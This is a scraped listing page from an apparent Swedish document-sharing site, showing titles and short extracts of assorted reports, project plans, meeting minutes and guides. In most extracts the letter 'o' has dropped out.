Mjukvaror och Tjänster. Hur kan du få ut mer av din printutrustning? Mjukvarr ch Tjänster Hur kan du få ut mer av din printutrustning? Innehållsförteckning Mbilprint Säkra Utskrifter Smart skanning Tnerövervakning Utskriftskntrll Service Statistik Här finns vi Vad kan göras

Läs mer

Styrgrupp Svensk geoprocess

Styrgrupp Svensk geoprocess Mötesanteckningar 2015-02-19 1(10) MÖTESANTECKNINGAR Kpia till Närvarande, Prjectplace.se, prjektets hemsida Styrgrupp Svensk geprcess Tid: Tisdagen den 10 februari 2015, kl. 10.00 16.00 Plats: SKL, Stckhlm

Läs mer

Inkomstdeklarera för lokalavdelning

Inkomstdeklarera för lokalavdelning Versin: 2012-05-03 Inkmstdeklarera för lkalavdelning En lkalavdelning sm registrerat sig hs Skatteverket ch fått ett rganisatinsnummer är skyldiga att inkmstdeklarera, avsett art ch strlek på intäkterna

Läs mer

Möjlighet att leva som andra ny lag om stöd och service till vissa personer med funktionsnedsättning

Möjlighet att leva som andra ny lag om stöd och service till vissa personer med funktionsnedsättning YTTRANDE 1 av 6 2009-01-20 Scialdepartementet 103 33 STOCKHOLM Möjlighet att leva sm andra ny lag m stöd ch service till vissa persner med funktinsnedsättning För följande kapitel har Umeå inga invändningar

Läs mer

Lägesrapport från Smålands Shanghaikontor juni till september 2013

Lägesrapport från Smålands Shanghaikontor juni till september 2013 Lägesrapprt från Smålands Shanghaikntr juni till september 2013 2013-10-08 After ett längre smmaruppehåll är vi nu tillbaka med lägesrapprter från Smålands Shanghaikntr. Uppehållet betyder inte att månaderna

Läs mer

Produktöversikt Boolware. SOFTWARE CORPORATION http://www.softbool.com

Produktöversikt Boolware. SOFTWARE CORPORATION http://www.softbool.com Prduktöversikt Blware SOFTWARE CORPORATION http://www.sftbl.cm 1 Nyttan med Blware Blware är specialiserat på att ge snabb återsökning, analys (textmining) samt beräkning i stra infrmatinsmängder med mmentan

Läs mer

ShoreTel Communicator Överblick

ShoreTel Communicator Överblick ShreTel Cmmunicatr Överblick ShreTel Cmmunicatr är det enklaste sättet att kmmunicera effektivt med dina kllegr ch affärspartners. Oavsett m du är nrmal användare, telefnist eller samtalsagent i ett Cntact

Läs mer

KomBas-projektet: Uppföljning av MI-utbildningarna hösten 2007 inom ramen för Miltonprojektet Integrerad Psykiatri DubbelDiagnoser

KomBas-projektet: Uppföljning av MI-utbildningarna hösten 2007 inom ramen för Miltonprojektet Integrerad Psykiatri DubbelDiagnoser KmBas-prjektet: Uppföljning av MI-utbildningarna hösten 27 inm ramen för Miltnprjektet Integrerad Psykiatri DubbelDiagnser Ll Lebedinski 21-4-8 1 Innehållsförteckning Inledning... 3 Metd ch material...

Läs mer

Granskning av praktiska exempel en interaktiv övning

Granskning av praktiska exempel en interaktiv övning Elektrnisk förvaltning sm idé, praktik ch Granskning av praktiska exempel en interaktiv övning IT ch management, åk 1 Agenda Inresetillstånd Verksamt Min pensin Kmmuner Karin Axelssn & Anders Perssn IEI/LiU

Läs mer

Delrapport 1 Landsbygd i centrum Juni 2014

Delrapport 1 Landsbygd i centrum Juni 2014 Delrapprt 1 Landsbygd i centrum Juni 2014 Landsbygd i centrum Beskrivning ur handlingsplan. Prjektet Landsbygd i centrum(lic) ska Utvecklingsenheten tillsammans med de 6 LUPbygderna genmföra åtgärder ch

Läs mer

Investerings prospekt

Investerings prospekt Investerings prspekt En intrduktin Net Sales pr merg Tel. +46 70 369 82 22 Isafjrdsgatan 22, B5tr. Fax:+ 46 8 755 03 98 inf@netsales.se När mer eget kapital behövs I många skeden i ett företags utveckling

Läs mer

Tävlingsdatabasen (TDB)

Tävlingsdatabasen (TDB) Tävlingsdatabasen (TDB) Anvisningar för distrikt ch klubbar sm arbetar med tävlingsdatabasen (TDB) Prpsitinen Viktiga datum ch tidpunkter är när tävlingen öppnas för internetanmälan, när ev. efteranmälning

Läs mer

Projektnamn: Vägledning för ett hälsosamt åldrande Seniorguiden. upprättades: Upprättad av: Namn Therese Räftegård Färggren och Anna Jansson

Projektnamn: Vägledning för ett hälsosamt åldrande Seniorguiden. upprättades: Upprättad av: Namn Therese Räftegård Färggren och Anna Jansson PROJEKTPLAN Prjektnamn: Vägledning för ett hälssamt åldrande Senirguiden Prjektansvarig: Avdelning: Kunskapsutveckling Enhet: Uppväxtvillkr ch hälssamt åldrande Prjektplan Juni 2010 upprättades: Upprättad

Läs mer

Datautvinning från digitala lagringsmedia DT2002

Datautvinning från digitala lagringsmedia DT2002 Datautvinning från digitala lagringsmedia DT2002 26:e maj 2009 0900-1300 IDE, Högsklan i Halmstad Kntaktpersn: Mattias Weckstén, ankn. 7396 Betyg: 55 p => 3 70 p => 4 85 p => 5 Max: 100 p Tillåtna hjälpmedel:

Läs mer

Nordiskt Forum Malmö 2014

Nordiskt Forum Malmö 2014 Nrdiskt Frum Malmö 2014 - New actin n wmen s rights Den nrdiska kvinnrörelsen bjuder in till Nrdiskt Frum Malmö 2014 new actin n wmen s rights. Knferensen är en frtsättning på de nrdiska knferenser sm

Läs mer

Förslag på samarbetsorganisation för gemensam plattform för nationellt digitalt folkbibliotek

Förslag på samarbetsorganisation för gemensam plattform för nationellt digitalt folkbibliotek Förslag på samarbetsrganisatin för gemensam plattfrm för natinellt digitalt flkbiblitek 1 Inledning ch bakgrund Kmmunakuten AB har fått i uppdrag att arbeta fram ett förslag på samarbetsrganisatin för

Läs mer

BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER

BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER I. INLEDNING BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER Denna bilaga kmpletterar reglerna för bidragets användning inm de lika budgetpsterna sm tillämpas på prjektet enligt avtalet. Dessa regler förtydligas

Läs mer

Utvärdering av Pilotprojektet Bärkraft intensiv

Utvärdering av Pilotprojektet Bärkraft intensiv Utvärdering av Piltprjektet Bärkraft intensiv Sammanfattning Piltprjektet Bärkraft intensiv har genmförts inm ramen för prjektet Förnybar energi från de gröna näringarna för att testa hur LRF genm ett

Läs mer

Innehållsförteckning Skolans bok. Wasaskolans information med läsårstider It s learning. Policy kring elevs frånvaro och regler från CSN

Innehållsförteckning Skolans bok. Wasaskolans information med läsårstider It s learning. Policy kring elevs frånvaro och regler från CSN Innehållsförteckning Sklans bk Wasasklans infrmatin med läsårstider It s learning Plicy kring elevs frånvar ch regler från CSN Rutiner för prövning vid betyg F eller ej betyg i kurs Plicydkument för Datr/IT-användning

Läs mer